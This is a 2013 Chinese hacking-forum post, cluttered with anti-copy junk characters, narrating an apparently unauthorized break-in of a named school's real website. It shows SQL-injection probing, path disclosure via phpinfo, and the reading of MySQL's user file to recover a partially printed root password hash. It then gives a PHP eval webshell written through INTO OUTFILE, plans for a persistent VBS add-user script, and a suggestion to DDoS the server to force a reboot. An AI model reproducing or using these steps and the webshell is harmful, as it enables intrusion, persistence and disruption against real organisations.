找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2855|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏. W6 E/ \4 |" {/ W, @2 R$ o
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!/ w. L% o; U* ?' ~- y
  a3 J" a. z6 J2 x1 W- y/ E

6 p1 {8 Z2 c; U- V" |  Y& [9 c' I" b
. P; O. {: U0 V. \% i常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 ' w0 G2 T6 u  |9 d9 S/ @

3 j$ U8 r& ]3 ^3 a那么想可以直接写入shell ,getshell有几个条件:( A% m  `6 E5 g) }
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
/ |: T& F+ C6 g: r$ P' q8 {. ^* l4 P9 y3 I1 w
试着爆绝对路径:
+ s# D( C( c3 ^, v1./phpMyAdmin/index.php?lang[]=1  % y' F& u5 C& f& ^7 h
2./phpMyAdmin/phpinfo.php  
4 C/ J  z* I- O1 T* x3./load_file()  $ Q+ W* t$ I0 v- ]4 P
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  ' D( y* s% ]' L1 \
5./phpmyadmin/libraries/select_lang.lib.php  
) E& P: }; s# |; g& j6./phpmyadmin/libraries/lect_lang.lib.php  
: R6 v, c0 ?6 h7 {& n8 C  i7./phpmyadmin/libraries/mcrypt.lib.php   3 b( f4 Y! O: ?& U( a, L" ?% F
8./phpmyadmin/libraries/export/xls.php  ' I7 H& j, `! A( |" s
3 G! c1 {- {/ @% E& b$ x0 u
均不行...........................( J2 y! s$ D8 ~7 R" b

- V0 |3 n) n' L& o御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php/ }  j5 {6 l6 p$ \; G2 F/ w

1 u2 j9 ?7 M$ H$ _/ ?* j. h权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin $ U* o7 W5 E) {5 l: H7 d
# d9 u& [7 d; x/ N8 e  T8 d( ^
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
) C) g8 w1 ]7 W5 L* l  F$ B
: O, S, F0 H* D  v2 p% V) k8 a. a: b& ^敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........# ^* R) `- f; E4 S

2 d2 i8 u  i2 ~( F想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
4 Z6 u6 |! ~  H3 z, |1 E) F; z6 [3 z2 m) G1 V9 |) W: z! ]8 S9 {
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini ! t1 z3 o/ }/ f( Z, K

% Q) `) r' R3 m0 |  ]自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
, K% I1 J# s% r; P4 Y+ V+ T2 m
: Q9 G* e# ?2 u& o# w" s成功读到root密码:, C  q2 U+ l: a6 @. v

3 M8 K! K9 j% ?; R17---- r(0072)
  B- _# W4 o$ y% p' U2 m3 s* {18---- o(006f): N8 ~& [8 V' ?- ?
19---- o(006f)
" b6 w7 k) K2 U% \20---- t(0074). [9 _- S& X7 K! k# F; h3 p, S
21---- *(002a)
2 B5 _4 W) j& {7 u4 \0 f22---- 8(0038)* H! [6 |- ?( t8 Q' S
23---- 2(0032)" [4 o" s- M' j" W
24---- E(0045)
" ?/ m3 `: a3 j. R* l4 i( Q1 H6 l' n25---- 1(0031)6 m( X6 j6 T: y2 X; E7 [- T
26---- C(0043)& j- U3 _, l; S" j) e
27---- 5(0035)8 o  b2 J# I  s4 k; q+ S
28---- 8(0038)& n) @7 A1 ~+ r5 u+ `. t+ K
29---- 2(0032)% w: [8 t: L- C* k" W
30---- 8(0038)
7 S# I. L) f( v0 K0 L31---- A(0041)3 J, a1 K7 n5 c+ {; B/ K  S
32---- 9(0039)
- V9 `; `; w$ |33---- B(0042). a7 y% Q- L0 l: s. Y+ m
34---- 5(0035)4 o, U, @% a. d5 |; ]4 u" b+ G
35---- 4(0034)
# w- ?6 I; B' N8 i36---- 8(0038)
3 ~/ N- f5 f+ b6 j' _3 S; T37---- 6(0036)8 D3 I8 j9 S- v# v6 z
38---- 4(0034)) }  N8 K" e8 m" b& D7 Q
39---- 9(0039)
0 ]  Z; ?7 Q) e7 j- B8 J4 K5 Z$ h40---- 1(0031)  N2 Z- O  O0 Y$ z1 x
41---- 1(0031)
! T; H0 H5 Z, S/ U42---- 5(0035)
) R+ G3 F) C8 g" h2 }  Q43---- 3(0033)
" h# x7 R7 ~; |2 r; V44---- 5(0035)
0 D, y: ?- D5 }" A$ F45---- 9(0039)
4 ~+ f; c  `8 t, F46---- 8(0038): C5 u" V% q7 |9 q- C
47---- F(0046)
% [7 b  W- T( j& B- M48---- F(0046)
2 P9 ]7 h( r5 {: D4 O: c49---- 4(0034)
' r* ]4 o# g- n50---- F(0046)* D- l2 Y7 z% |/ |6 p+ x1 @1 ]
51---- 0(0030)
1 G. [. V3 g/ _1 r) w1 l1 q/ M52---- 3(0033); t, m# F7 @) t% E, h7 J
53---- 2(0032)
9 t2 J; o9 {* q/ m- D' c4 n, C0 f: C54---- A(0041)
' D; N& \5 o# D+ f55---- 4(0034)
" {. I, L  M+ Z+ O# H56---- A(0041)1 c$ n$ n- E- b1 ^( V
57---- B(0042)
& U- f, e, G. }6 T4 F58---- *(0044)
1 N* T$ ?& L$ j% k/ I! q( w59---- *(0035)6 x1 c' C" e6 c+ |8 i2 w0 V2 ^6 ^1 ~6 c
60---- *(0041)
5 X9 v3 L* `+ V% e! P8 G61---- *0032)
. V& [, f$ K( d6 f/ ?: O0 k$ X2 X$ L2 L. M4 l
解密后成功登陆phpmyamin' n" ]8 \: I0 }% {3 d; y6 i
                          
9 \6 u- i' ^: s1 O! l  C+ g5 W. c4 G. d6 F
                             
) D4 }7 \# o7 t4 ^, ~' [' |! z* \7 O9 I+ k
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'8 I0 ]1 Z1 l* z% h+ S

  f2 f$ z6 u& @2 F& V5 |0 z- s( f成功执行,拿下shell,菜刀连接:# X0 A' s$ _5 p$ \) B# v! Y  L! Z, q0 B
' \1 j+ N# L8 ^/ K. v
服务器不支持asp,aspx,php提权无果...................$ X. v8 h. n* z8 N
% U" A2 e9 j. s- W; ~
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:3 ^* }. H/ ^1 w9 B% c1 i0 h8 E" x$ [
服务器上已经有个隐藏帐号了
) v  P) ]* U; i) A+ O5 t4 O* J
别名     administrators3 T1 f1 ]) O" s
注释     管理员对计算机/域有不受限制的完全访问权

4 i8 v( `6 q, d7 o, F
成员
) d, T2 L" E2 p* }; H' W
-------------------------------------------------------------------------------
: V4 M7 `: ~( s$ ~* Madmin
# ]0 z# e, t" O; k1 yAdministrator
+ l4 v% e( ~4 \7 P  s. Kslipper$
( ^/ q3 m/ \1 G* }. Rsqluser- _* W/ w4 U) O% |: ]9 I
命令成功完成。 * V, L0 D0 X# l! z- @- h1 X
, x: p9 T2 |( c2 L0 A1 S$ ?% ?
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
% f, q9 t5 D& v: T9 \' ?! R) Z
" o( N4 o2 k# s6 ]; I: B& v% hddos服务器重启,不然就只能坐等服务器重启了...............................
4 b. N, q& B# |" h: d% i. j( j0 ]+ Q+ ^
      

  ?9 H# g: v* t4 X* U' X* B

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表